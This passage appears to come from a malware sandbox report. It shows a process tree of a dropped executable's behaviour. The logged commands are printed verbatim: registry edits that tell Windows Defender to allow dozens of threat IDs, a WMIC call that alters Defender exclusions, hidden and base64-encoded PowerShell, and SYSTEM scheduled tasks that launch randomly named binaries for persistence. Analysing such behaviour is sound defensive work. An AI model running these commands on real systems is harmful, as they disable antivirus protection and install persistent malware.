  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5620
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6240
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4720
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4604
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:1064
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4312
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5328
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:2228
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2684
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6828
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6860
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4736
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5224
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6324
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6932
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5860
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5416
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6032
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5612
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 01:43:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\OQqdOxl.exe\" GH /MuNZdidAB 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:6464
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:6292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5932
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5032
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6532

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:6084

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5776

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\UlCYPbb.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\UlCYPbb.exe GH /hQJwdidTf 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5180
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2896
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:7012
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5084
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2500
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:788
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4580
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4292
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2276
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1748
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4516
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5072
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2352
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6772
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6000
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6976
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:6812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:60
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:6716
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:4540
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6332
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:6172
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\VIuiRb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\WcIeRqd.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1592
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:6432
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\PTnQZsL.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\UqWOgSW.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\DEoCyRj.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\FvJrrQa.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 00:42:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\DUpAnIhC\KVaaPdw.dll\",#1 /XqdidJ 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:6140
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:5732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:4580
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4848

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\OQqdOxl.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\OQqdOxl.exe GH /MuNZdidAB 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:6524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p 